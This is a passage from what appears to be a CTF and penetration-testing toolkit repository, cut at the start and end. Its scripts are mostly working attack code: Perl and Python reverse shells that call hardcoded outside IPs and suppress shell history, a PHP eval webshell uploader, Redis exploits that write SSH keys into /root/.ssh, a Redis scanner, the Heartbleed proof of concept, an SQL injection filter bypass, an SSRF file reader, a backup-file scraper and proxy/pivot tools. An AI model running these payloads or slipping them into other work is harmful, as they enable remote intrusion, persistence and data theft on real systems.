time2= time.time() 79 | print time2-time1 80 | -------------------------------------------------------------------------------- /tools/post_upload.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import requests 5 | import re 6 | import string 7 | import random 8 | import sys 9 | 10 | reload(sys) 11 | sys.setdefaultencoding("utf-8") 12 | 13 | req = requests.session() 14 | url = '' 15 | 16 | 17 | def upload(file_name, file_data): 18 | files = { 19 | "file": (file_name, file_data, 'application/octet-stream'), 20 | } 21 | res = req.post(url=url, files=files) 22 | if res.status_code == 200: 23 | return res.content 24 | else: 25 | return False 26 | 27 | 28 | if __name__ == '__main__': 29 | shell1 = 'paaaPD9waHAgZXZhbCgkX1BPU1RbOTk5XSk7Pz5w' 30 | res = upload(shell1) 31 | if res: 32 | print res 33 | -------------------------------------------------------------------------------- /tools/random_string.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import string 5 | import random 6 | import sys 7 | 8 | reload(sys) 9 | sys.setdefaultencoding("utf-8") 10 | 11 | 12 | def randstr(num=10): 13 | return string.join(random.sample(['z', 'y', 'x', 'w', 'v', 'u', 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'k', 'j', 'i', 'h', 'g', 'f', 'e', 'd', 'c', 'b', 'a'], num)).replace(' ', '') 14 | 15 | if __name__ == '__main__': 16 | print randstr() 17 | -------------------------------------------------------------------------------- /tools/redis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys,httplib 5 | import socket,sys 6 | fobj = open('redis.txt','r') 7 | fileHandle = open('vul.txt','a+') 8 | payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' 9 | s = socket.socket() 10 | socket.setdefaulttimeout(10) 11 | for target in fobj: 12 | ip = target.strip() 13 | try: 14 | port = 6379 15 | s.connect((ip, port)) 16 | s.send(payload) 17 | recvdata = s.recv(1024) 18 | if recvdata and 'redis_version' in recvdata: 19 | fileHandle.write(target) 20 | print 'server is vulerable' 21 | except: 22 | pass 23 | -------------------------------------------------------------------------------- /tools/redis_ssh.sh: -------------------------------------------------------------------------------- 1 | redis-cli -h $1 flushall 2 | cat pub.txt | redis-cli -h $1 -x set 1 3 | redis-cli -h $1 config set dir /root/.ssh 4 | redis-cli -h $1 config set dbfilename authorized_keys 5 | redis-cli -h $1 save -------------------------------------------------------------------------------- /tools/reverse-shell.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use Socket; 4 | $i = "192.168.31.157"; 5 | $p = 7788; 6 | socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); 7 | if(connect(S,sockaddr_in($p,inet_aton($i)))){ 8 | open(STDIN,">&S"); 9 | open(STDOUT,">&S"); 10 | open(STDERR,">&S"); 11 | exec("/bin/sh -i"); 12 | }; -------------------------------------------------------------------------------- /tools/rexp.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from os import system 3 | from sys import argv 4 | def send(conn,cmd): 5 | try: 6 | conn.send(cmd+"\n") 7 | recv=conn.recv(5) 8 | #conn.close() 9 | recv=recv.replace("\n",''), 10 | return recv 11 | except: 12 | return False 13 | 14 | def conn_redis(args): 15 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | args=args.split(":") 17 | host=args[0] 18 | port=int(args[1]) 19 | try: 20 | client.connect((host, port)) 21 | return client 22 | except: 23 | return False 24 | 25 | if len(argv)!=2: 26 | print "Usage: python rexp.py 127.0.0.1:6379" 27 | exit() 28 | host=argv[1] 29 | host.split(":") 30 | port=6379 31 | if len(host)==2: 32 | port=int(host[1]) 33 | conn=conn_redis("%s:%d"%(host,port)) 34 | send(conn,"flushall") 35 | system("cat foo.txt| redis-cli -h %s -p %d -x set pwn"%(host,port)) 36 | cmd='''CONFIG set dir /root/.ssh/ 37 | config set dbfilename authorized_keys 38 | save 39 | exit''' 40 | cmd=cmd.split("\n") 41 | for c in cmd: 42 | send(conn,c) 43 | -------------------------------------------------------------------------------- /tools/rtcp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | ''' 5 | filename:rtcp.py 6 | @desc: 7 | 利用python的socket端口转发,用于远程维护 8 | 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 9 | 10 | @usage: 11 | ./rtcp.py stream1 stream2 12 | stream为:l:port或c:host:port 13 | l:port表示监听指定的本地端口 14 | c:host:port表示监听远程指定的端口 15 | 16 | @author: watercloud, zd, knownsec team 17 | @web: www.knownsec.com, blog.knownsec.com 18 | @date: 2009-7 19 | ''' 20 | 21 | import socket 22 | import sys 23 | import threading 24 | import time 25 | 26 | streams = [None, None] # 存放需要进行数据转发的两个数据流(都是SocketObj对象) 27 | debug = 1 # 调试状态 0 or 1 28 | 29 | def _usage(): 30 | print 'Usage: ./rtcp.py stream1 stream2\nstream : l:port or c:host:port' 31 | 32 | def _get_another_stream(num): 33 | ''' 34 | 从streams获取另外一个流对象,如果当前为空,则等待 35 | ''' 36 | if num == 0: 37 | num = 1 38 | elif num == 1: 39 | num = 0 40 | else: 41 | raise "ERROR" 42 | 43 | while True: 44 | if streams[num] == 'quit': 45 | print("can't connect to the target, quit now!") 46 | sys.exit(1) 47 | 48 | if streams[num] != None: 49 | return streams[num] 50 | else: 51 | time.sleep(1) 52 | 53 | def _xstream(num, s1, s2): 54 | ''' 55 | 交换两个流的数据 56 | num为当前流编号,主要用于调试目的,区分两个回路状态用。 57 | ''' 58 | try: 59 | while True: 60 | #注意,recv函数会阻塞,直到对端完全关闭(close后还需要一定时间才能关闭,最快关闭方法是shutdow) 61 | buff = s1.recv(1024) 62 | if debug > 0: 63 | print num,"recv" 64 | if len(buff) == 0: #对端关闭连接,读不到数据 65 | print num,"one closed" 66 | break 67 | s2.sendall(buff) 68 | if debug > 0: 69 | print num,"sendall" 70 | except : 71 | print num,"one connect closed." 72 | 73 | try: 74 | s1.shutdown(socket.SHUT_RDWR) 75 | s1.close() 76 | except: 77 | pass 78 | 79 | try: 80 | s2.shutdown(socket.SHUT_RDWR) 81 | s2.close() 82 | except: 83 | pass 84 | 85 | streams[0] = None 86 | streams[1] = None 87 | print num, "CLOSED" 88 | 89 | def _server(port, num): 90 | ''' 91 | 处理服务情况,num为流编号(第0号还是第1号) 92 | ''' 93 | srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 94 | srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 95 | srv.bind(('0.0.0.0', port)) 96 | srv.listen(1) 97 | while True: 98 | conn, addr = srv.accept() 99 | print "connected from:", addr 100 | streams[num] = conn # 放入本端流对象 101 | s2 = _get_another_stream(num) # 获取另一端流对象 102 | _xstream(num, conn, s2) 103 | 104 | def _connect(host, port, num): 105 | ''' 处理连接,num为流编号(第0号还是第1号) 106 | 107 | @note: 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 108 | ''' 109 | not_connet_time = 0 110 | wait_time = 36 111 | try_cnt = 199 112 | while True: 113 | if not_connet_time > try_cnt: 114 | streams[num] = 'quit' 115 | print('not connected') 116 | return None 117 | 118 | conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 119 | try: 120 | conn.connect((host, port)) 121 | except Exception, e: 122 | print ('can not connect %s:%s!' % (host, port)) 123 | not_connet_time += 1 124 | time.sleep(wait_time) 125 | continue 126 | 127 | print "connected to %s:%i" % (host, port) 128 | streams[num] = conn #放入本端流对象 129 | s2 = _get_another_stream(num) #获取另一端流对象 130 | _xstream(num, conn, s2) 131 | 132 | 133 | if __name__ == '__main__': 134 | if len(sys.argv) != 3: 135 | _usage() 136 | sys.exit(1) 137 | tlist = [] # 线程列表,最终存放两个线程对象 138 | targv = [sys.argv[1], sys.argv[2] ] 139 | for i in [0, 1]: 140 | s = targv[i] # stream描述 c:ip:port 或 l:port 141 | sl = s.split(':') 142 | if len(sl) == 2 and (sl[0] == 'l' or sl[0] == 'L'): # l:port 143 | t = threading.Thread(target=_server, args=(int(sl[1]), i)) 144 | tlist.append(t) 145 | elif len(sl) == 3 and (sl[0] == 'c' or sl[0] == 'C'): # c:host:port 146 | t = threading.Thread(target=_connect, args=(sl[1], int(sl[2]), i)) 147 | tlist.append(t) 148 | else: 149 | _usage() 150 | sys.exit(1) 151 | 152 | for t in tlist: 153 | t.start() 154 | for t in tlist: 155 | t.join() 156 | sys.exit(0) 157 | -------------------------------------------------------------------------------- /tools/runmd5.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import md5 5 | 6 | def md5x(str): 7 | m1 = md5.new() 8 | m1.update(str) 9 | return m1.hexdigest() 10 | 11 | 12 | def run(arg): 13 | code = arg[0] 14 | start = 10000000 15 | end = 100000000 16 | if len(arg) > 2: 17 | start = arg[1] 18 | if len(arg) > 3: 19 | start = arg[2] 20 | if not code: 21 | return False 22 | print 'Runing...' 23 | while start <= end: 24 | res = md5x(str(start))[:len(code)] 25 | if res == code: 26 | print start 27 | return start 28 | start += 1 29 | 30 | if __name__ == '__main__': 31 | run(['1ceac']) -------------------------------------------------------------------------------- /tools/shell_53_udp.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | #!/usr/bin/env python 3 | """ 4 | back connect py version,only linux have pty module 5 | code by google security team 6 | UDP by anthrax@insight-labs.org 7 | """ 8 | import sys 9 | import os 10 | import socket 11 | import pty 12 | 13 | shell = "/bin/sh" 14 | 15 | 16 | def usage(name): 17 | print 'python reverse connector' 18 | print 'usage: %s [udp]' % name 19 | 20 | 21 | def main(): 22 | if len(sys.argv) < 3: 23 | usage(sys.argv[0]) 24 | sys.exit() 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | try: 27 | if sys.argv[3] == 'udp': 28 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 29 | except: 30 | pass 31 | try: 32 | s.connect((sys.argv[1], int(sys.argv[2]))) 33 | print 'connect ok' 34 | except: 35 | print 'connect faild' 36 | sys.exit() 37 | os.dup2(s.fileno(), 0) 38 | os.dup2(s.fileno(), 1) 39 | os.dup2(s.fileno(), 2) 40 | global shell 41 | os.unsetenv("HISTFILE") 42 | os.unsetenv("HISTFILESIZE") 43 | os.unsetenv("HISTSIZE") 44 | os.unsetenv("HISTORY") 45 | os.unsetenv("HISTSAVE") 46 | os.unsetenv("HISTZONE") 47 | os.unsetenv("HISTLOG") 48 | os.unsetenv("HISTCMD") 49 | os.putenv("HISTFILE", '/dev/null') 50 | os.putenv("HISTSIZE", '0') 51 | os.putenv("HISTFILESIZE", '0') 52 | pty.spawn(shell) 53 | s.close() 54 | 55 | if __name__ == '__main__': 56 | main() 57 | -------------------------------------------------------------------------------- /tools/socket_shell.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import subprocess 3 | import os 4 | IP = "127.0.0.1" 5 | PORT = 9999 6 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | s.connect((IP, PORT)) 8 | os.dup2(s.fileno(), 0) 9 | os.dup2(s.fileno(), 1) 10 | os.dup2(s.fileno(), 2) 11 | p = subprocess.call(["/bin/bash", "-i"]) 12 | -------------------------------------------------------------------------------- /tools/socket_shell_bash_py.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.78.13.23",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' -------------------------------------------------------------------------------- /tools/socks5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Python Dynamic Socks5 Proxy 3 | # Usage: python socks5.py 1080 4 | # Background Run: nohup python s5.py 1080 & 5 | 6 | import socket 7 | import sys 8 | import select 9 | import SocketServer 10 | import struct 11 | import time 12 | 13 | 14 | class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): 15 | pass 16 | 17 | 18 | class Socks5Server(SocketServer.StreamRequestHandler): 19 | 20 | def handle_tcp(self, sock, remote): 21 | fdset = [sock, remote] 22 | while True: 23 | r, w, e = select.select(fdset, [], []) 24 | if sock in r: 25 | if remote.send(sock.recv(4096)) <= 0: 26 | break 27 | if remote in r: 28 | if sock.send(remote.recv(4096)) <= 0: 29 | break 30 | 31 | def handle(self): 32 | try: 33 | pass # print 'from ', self.client_address nothing to do. 34 | sock = self.connection 35 | # 1. Version 36 | sock.recv(262) 37 | sock.send("\x05\x00") 38 | # 2. Request 39 | data = self.rfile.read(4) 40 | mode = ord(data[1]) 41 | addrtype = ord(data[3]) 42 | if addrtype == 1: # IPv4 43 | addr = socket.inet_ntoa(self.rfile.read(4)) 44 | elif addrtype == 3: # Domain name 45 | addr = self.rfile.read(ord(sock.recv(1)[0])) 46 | port = struct.unpack('>H', self.rfile.read(2)) 47 | reply = "\x05\x00\x00\x01" 48 | try: 49 | if mode == 1: # 1. Tcp connect 50 | remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 51 | remote.connect((addr, port[0])) 52 | pass # print 'To', addr, port[0] nothing do to. 53 | else: 54 | reply = "\x05\x07\x00\x01" # Command not supported 55 | local = remote.getsockname() 56 | reply += socket.inet_aton(local[0]) + \ 57 | struct.pack(">H", local[1]) 58 | except socket.error: 59 | # Connection refused 60 | reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00' 61 | sock.send(reply) 62 | # 3. Transfering 63 | if reply[1] == '\x00': # Success 64 | if mode == 1: # 1. Tcp connect 65 | self.handle_tcp(sock, remote) 66 | except socket.error: 67 | pass # print 'error' nothing to do . 68 | except IndexError: 69 | pass 70 | 71 | 72 | def main(): 73 | filename = sys.argv[0] 74 | if len(sys.argv) < 2: 75 | print 'usage: ' + filename + ' port' 76 | sys.exit() 77 | socks_port = int(sys.argv[1]) 78 | server = ThreadingTCPServer(('', socks_port), Socks5Server) 79 | print 'bind port: %d' % socks_port + ' ok!' 80 | server.serve_forever() 81 | if __name__ == '__main__': 82 | main() 83 | -------------------------------------------------------------------------------- /tools/sqlin.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import requests 5 | import re 6 | import string 7 | import random 8 | import sys 9 | 10 | reload(sys) 11 | sys.setdefaultencoding("utf-8") 12 | 13 | req = requests.session() 14 | 15 | 16 | def post(url, data, headers): 17 | res = req.post(url=url, data=data, headers=headers) 18 | if res.status_code == 200: 19 | return res.content 20 | else: 21 | return False 22 | 23 | 24 | def get(url, headers): 25 | res = req.get(url=url, headers=headers) 26 | if res.status_code == 200: 27 | return res.content 28 | else: 29 | return False 30 | 31 | 32 | def get_1(url, headers): 33 | res = req.get(url=url, headers=headers) 34 | if res.status_code == 200: 35 | return res.content 36 | else: 37 | return False 38 | 39 | 40 | def get_2(url, headers): 41 | res = req.get(url=url, headers=headers) 42 | if res.status_code == 200: 43 | return res.content 44 | else: 45 | return False 46 | 47 | if __name__ == '__main__': 48 | url = 'http://202.120.7.203/index.php?id=' 49 | # # & 0 1 2 3 4 5 6 7 8 9 @ 50 | 51 | headers = {} 52 | 53 | sql = "-1 union sel\x00ect 1,(sel\x00ect+flag+fro\x00m+flag),3" 54 | print get(url + sql, headers) 55 | # 56 | # 57 | # 58 | # 59 | # flag{W4f_bY_paSS_f0R_CI} 60 | # 61 | # 62 | 63 | #

flag{W4f_bY_paSS_f0R_CI}

64 | #
65 | # 3
66 | #

View article

67 | 68 | # 69 | # 70 | -------------------------------------------------------------------------------- /tools/ssltest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) 4 | # The author disclaims copyright to this source code. 5 | 6 | import sys 7 | import struct 8 | import socket 9 | import time 10 | import select 11 | import re 12 | from optparse import OptionParser 13 | 14 | options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') 15 | options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') 16 | 17 | def h2bin(x): 18 | return x.replace(' ', '').replace('\n', '').decode('hex') 19 | 20 | hello = h2bin(''' 21 | 16 03 02 00 dc 01 00 00 d8 03 02 53 22 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 23 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 24 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 25 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 26 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 27 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 28 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 29 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 30 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 31 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 32 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 33 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 34 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 35 | 00 0f 00 01 01 36 | ''') 37 | 38 | hb = h2bin(''' 39 | 18 03 02 00 03 40 | 01 40 00 41 | ''') 42 | 43 | def hexdump(s): 44 | for b in xrange(0, len(s), 16): 45 | lin = [c for c in s[b : b + 16]] 46 | hxdat = ' '.join('%02X' % ord(c) for c in lin) 47 | pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) 48 | print ' %04x: %-48s %s' % (b, hxdat, pdat) 49 | print 50 | 51 | def recvall(s, length, timeout=5): 52 | endtime = time.time() + timeout 53 | rdata = '' 54 | remain = length 55 | while remain > 0: 56 | rtime = endtime - time.time() 57 | if rtime < 0: 58 | return None 59 | r, w, e = select.select([s], [], [], 5) 60 | if s in r: 61 | data = s.recv(remain) 62 | # EOF? 63 | if not data: 64 | return None 65 | rdata += data 66 | remain -= len(data) 67 | return rdata 68 | 69 | 70 | def recvmsg(s): 71 | hdr = recvall(s, 5) 72 | if hdr is None: 73 | print 'Unexpected EOF receiving record header - server closed connection' 74 | return None, None, None 75 | typ, ver, ln = struct.unpack('>BHH', hdr) 76 | pay = recvall(s, ln, 10) 77 | if pay is None: 78 | print 'Unexpected EOF receiving record payload - server closed connection' 79 | return None, None, None 80 | print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) 81 | return typ, ver, pay 82 | 83 | def hit_hb(s): 84 | s.send(hb) 85 | while True: 86 | typ, ver, pay = recvmsg(s) 87 | if typ is None: 88 | print 'No heartbeat response received, server likely not vulnerable' 89 | return False 90 | 91 | if typ == 24: 92 | print 'Received heartbeat response:' 93 | hexdump(pay) 94 | if len(pay) > 3: 95 | print 'WARNING: server returned more data than it should - server is vulnerable!' 96 | else: 97 | print 'Server processed malformed heartbeat, but did not return any extra data.' 98 | return True 99 | 100 | if typ == 21: 101 | print 'Received alert:' 102 | hexdump(pay) 103 | print 'Server returned error, likely not vulnerable' 104 | return False 105 | 106 | def main(): 107 | opts, args = options.parse_args() 108 | if len(args) < 1: 109 | options.print_help() 110 | return 111 | 112 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 113 | print 'Connecting...' 114 | sys.stdout.flush() 115 | s.connect((args[0], opts.port)) 116 | print 'Sending Client Hello...' 117 | sys.stdout.flush() 118 | s.send(hello) 119 | print 'Waiting for Server Hello...' 120 | sys.stdout.flush() 121 | while True: 122 | typ, ver, pay = recvmsg(s) 123 | if typ == None: 124 | print 'Server closed connection without sending Server Hello.' 125 | return 126 | # Look for server hello done message. 127 | if typ == 22 and ord(pay[0]) == 0x0E: 128 | break 129 | 130 | print 'Sending heartbeat request...' 131 | sys.stdout.flush() 132 | s.send(hb) 133 | hit_hb(s) 134 | 135 | if __name__ == '__main__': 136 | main() 137 | -------------------------------------------------------------------------------- /tools/ssrf.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import requests as req 5 | import base64 6 | import re 7 | import sys 8 | import os 9 | 10 | 11 | def decode_base64(html): 12 | if 'data:image' in html: 13 | op = re.search(r'data:image/jpeg;base64, (\S)"$', html) 14 | if op: 15 | return op.group(1) 16 | else: 17 | return html 18 | else: 19 | return html 20 | 21 | 22 | def get_file(path, ispost=False): 23 | global url 24 | if ispost: 25 | res = req.post(url, data=ispost) 26 | else: 27 | res = req.get(url + path) 28 | html = res.content 29 | if res.status_code == 200: # and 'data:image' in html: 30 | # print res.url 31 | return html 32 | else: 33 | return False 34 | 35 | 36 | def get_one_file(path, data=False): 37 | global p 38 | _data = {} 39 | if data: 40 | _data = { 41 | data: p + path 42 | } 43 | html = get_file(path, _data) 44 | if html: 45 | # print html 46 | return html 47 | else: 48 | return '' 49 | # return decode_base64(html) 50 | 51 | 52 | def save_to_file(file_name, file_data, dic_name): 53 | print file_name 54 | with open(file_name, 'a') as f: 55 | if file_data: 56 | f.write(dic_name) 57 | f.write("\n") 58 | f.write(file_data) 59 | f.write("\n") 60 | f.write("\n") 61 | 62 | 63 | def get_dic(dic): 64 | c = [] 65 | with open("../dict/" + dic) as f: 66 | c = f.readlines() 67 | c = [i.replace('\n', '') for i in c] 68 | return c 69 | 70 | 71 | def down_file_by_dict(dic_name, tmp, p=False): 72 | dics = get_dic(dic_name) 73 | for dic in dics: 74 | _dic_name = dic.split("/") 75 | _dic_name = _dic_name[len(_dic_name) - 1] 76 | print dic 77 | save_to_file("./../tmp/" + tmp, get_one_file(dic, p), dic) 78 | # sys.exit() 79 | 80 | 81 | def down_one_file(file_name, argv, save_dir): 82 | save_file = file_name.split("/")[-1] 83 | if not os.path.exists("/Users/virink/tmp/" + save_dir): 84 | os.mkdir("/Users/virink/tmp/" + save_dir) 85 | with open("/Users/virink/tmp/" + save_dir + "/" + save_file, 'w') as f: 86 | res = get_one_file(file_name, argv) 87 | print res 88 | f.write(res) 89 | 90 | if __name__ == '__main__': 91 | url = "http://sha4.chal.pwning.xxx/upload" 92 | p = 'file://' 93 | argv = 'url' 94 | # print get_one_file('/etc/apache2/apache2.conf', "url") 95 | # print get_one_file('/var/www/sha4/server.py', "url") 96 | # /var/tmp/comments/%s.file 97 | print get_one_file("/var/tmp/comments/8a9d7c33b323f0fbb3a82c4b9c157380.file", "url") 98 | # ############### 99 | # down_one_file('/var/www/sha4/admin.py', 'url', 'pctf_sha4') 100 | # down_file_by_dict('ssrf&lfi/proc.dic', 'pctf_sha4_proc.log', argv) 101 | -------------------------------------------------------------------------------- /tools/tarfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: utf-8 -*- 3 | 4 | import os 5 | 6 | __info__ = { 7 | "desc": "Output a tar file by script", 8 | "version": "1.0", 9 | "usage": "tarfile filename content_name content_data" 10 | } 11 | 12 | 13 | def tarfile(content_name='test.php', content_data='test'): 14 | if len(content_name) > 100: 15 | print 'content_name error' 16 | return 17 | t_name = content_name + '\x00' * (100 - len(content_name)) 18 | t_mode = '0000664\x00' 19 | t_uid = '0001750\x00' 20 | t_gid = '0001750\x00' 21 | t_size = '00000000004\x00' 22 | t_mtime = '01274124644\x00' 23 | t_chksum = '' 24 | t_typeflag = '0' 25 | t_linkname = '\x00' * 100 26 | t_magic = 'ustar\x32' 27 | t_version = '\x32\x00' 28 | t_uname = 'root' + '\x00' * (32 - 4) 29 | t_gname = 'root' + '\x00' * (32 - 4) 30 | t_devmajor = '\x00' * 8 31 | t_devminor = '\x00' * 8 32 | t_prefix = '\x00' * 155 33 | t_padding = '\x00' * 12 34 | t_block = content_data + '\x00' * (512 - len(content_data)) 35 | if len(content_data) < 1000: 36 | s = str(len(content_data)) 37 | if len(content_data) > 0 and len(content_data) < 10: 38 | t_size = '0000000000' + s + '\x00' 39 | elif len(content_data) > 10 and len(content_data) < 100: 40 | t_size = '000000000' + s + '\x00' 41 | elif len(content_data) > 100: 42 | t_size = '00000000' + s + '\x00' 43 | else: 44 | return 0 45 | _a = t_name + t_mode + t_uid + t_gid + t_size + t_mtime 46 | _b = t_typeflag + t_linkname + t_magic + t_version + t_uname + \ 47 | t_gname + t_devmajor + t_devminor + t_prefix + t_padding 48 | _t = _a + _b 49 | _sum = 0 50 | for j in _t: 51 | _sum += ord(j) 52 | t_chksum = '0' * (8 - len(str(oct(_sum + 256)))) + str(oct(_sum + 256)) 53 | return _a + t_chksum + _b + t_block + '\x00' * 512 54 | 55 | 56 | def saveToFile(filename, tarData): 57 | f = open(filename, 'wb') 58 | f.write(tarData) 59 | f.close() 60 | 61 | 62 | def run(fn, cn, cd): 63 | filename = fn + ".tar" 64 | content_name = cn or "virink.txt" 65 | content_data = cd or "virink" 66 | print 'Runing...' 67 | saveToFile(filename, tarfile(content_name, content_data)) 68 | if os.path.exists(filename): 69 | print os.path.join("./", filename) 70 | else: 71 | print False 72 | 73 | if __name__ == '__main__': 74 | run('9981', '2333', 'ddddd') 75 | -------------------------------------------------------------------------------- /tools/urllibreq.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | #-*- encoding: utf-8 -*- 3 | 4 | import time 5 | import urllib 6 | import urllib2 7 | import json 8 | 9 | 10 | def post(url, values): 11 | data = urllib.urlencode(values) 12 | req = urllib2.Request(url, data) 13 | req.add_header( 14 | 'user-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0') 15 | req.add_header('cache-control', 'no-cache') 16 | req.add_header('accept', '*/*') 17 | req.add_header('connection', 'keep-alive') 18 | req.add_header('Content-Type', 'application/x-www-form-urlencoded') 19 | response = urllib2.urlopen(req) 20 | code = response.getcode() 21 | body = response.read() 22 | return code, body 23 | 24 | 25 | if __name__ == '__main__': 26 | url = 'http://' 27 | values = {'tel': 'xxx', 'type': "xxx"} 28 | code, body = post(url, values) 29 | -------------------------------------------------------------------------------- /tools/vi_vim_scan_and_download.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # __Author__: Byblue 3 | # __Change__: Virink 4 | 5 | import time 6 | import urllib 7 | import urllib2 8 | 9 | 10 | interval = 1 11 | 12 | websites = { 13 | "http://web.l-ctf.com:55533": "php" 14 | } 15 | script = { 16 | "general": { 17 | "/robots.txt", "/install.txt", "/password.txt", "/readme.txt", "/sql.txt", "/Password.txt", "/ReadMe.txt", 18 | "/www.rar", "/wwwroot.rar", "/webroot.rar", "/backup.rar", 19 | "/www.zip", "/wwwroot.zip", "/webroot.zip", "/backup.zip", 20 | "/DS_Store", "/.DS_Store", "/.svn/entries", "/.htaccess", "/.git/config" 21 | }, 22 | "php": { 23 | "index.php", 24 | "config.php" 25 | }, 26 | "jsp": { 27 | "index.jsp", 28 | "config.jsp" 29 | }, 30 | "asp": { 31 | "index.asp", 32 | "config.asp" 33 | }, 34 | "aspx": { 35 | "index.aspx", 36 | "config.aspx" 37 | }, 38 | "discuz": { 39 | "config/config_global.php", # discuz 40 | "config/config_ucenter.php", # discuz 41 | "uc_server/data/config.inc.php" # discuz 42 | }, 43 | "dede": { 44 | "data/common.inc.php", # dede old version 45 | "include/config_base.php" # dede new version 46 | }, 47 | "qibo": { 48 | "data/mysql_config.php" # qibo 49 | }, 50 | "thinkphp": { 51 | "Common/Conf/config.php" # thinkphp 52 | } 53 | } 54 | 55 | 56 | def getScriptConfig(sc): 57 | if script.has_key(sc): 58 | return script[sc] 59 | else: 60 | return script['php'] 61 | 62 | 63 | def downLoad(fileUrl, path="./downloads/"): 64 | try: 65 | u = urllib2.urlopen(fileUrl) 66 | #data = u.read() 67 | splitPath = fileUrl.split('/') 68 | fName = splitPath.pop() 69 | print "Downloading: %s " % (fName) 70 | start = fileUrl.find('://')+3 71 | end = fileUrl.find('/', start) 72 | urllib.urlretrieve(fileUrl, path+fileUrl[start:end]+"_"+fName) 73 | except Exception, e: 74 | print "[+]%s----%s" % (fileUrl, e) 75 | 76 | 77 | def usage(): 78 | print "no usage." 79 | 80 | 81 | def main(): 82 | generalBackup = getScriptConfig('general') 83 | 84 | while (True): 85 | for backup in generalBackup: 86 | for website in websites.keys(): 87 | script = websites[website] 88 | downLoad(website+backup) 89 | time.sleep(interval) 90 | 91 | for backup in vimBackup: 92 | for website in websites.keys(): 93 | script = websites[website] 94 | if isinstance(getScriptConfig(script), set): 95 | vimBackup = getScriptConfig(script) 96 | path = website+backup 97 | idx = path.rfind('/') 98 | downLoad(path[0:idx]+"/" + path[idx+1:]+".bak") 99 | time.sleep(interval) 100 | 101 | for backup in vimBackup: 102 | for website in websites.keys(): 103 | script = websites[website] 104 | if isinstance(getScriptConfig(script), set): 105 | vimBackup = getScriptConfig(script) 106 | path = website+backup 107 | idx = path.rfind('/') 108 | downLoad(path[0:idx]+"/" + path[idx+1:]+"~") 109 | time.sleep(interval) 110 | 111 | for backup in vimBackup: 112 | for website in websites.keys(): 113 | script = websites[website] 114 | if isinstance(getScriptConfig(script), set): 115 | vimBackup = getScriptConfig(script) 116 | path = website+backup 117 | idx = path.rfind('/') 118 | downLoad(path[0:idx]+"/."+path[idx+1:]+".swp") 119 | time.sleep(interval) 120 | break 121 | if __name__ == "__main__": 122 | start = time.time() 123 | main() 124 | end = time.time() 125 | -------------------------------------------------------------------------------- /webshell/asp/ice.asp: -------------------------------------------------------------------------------- 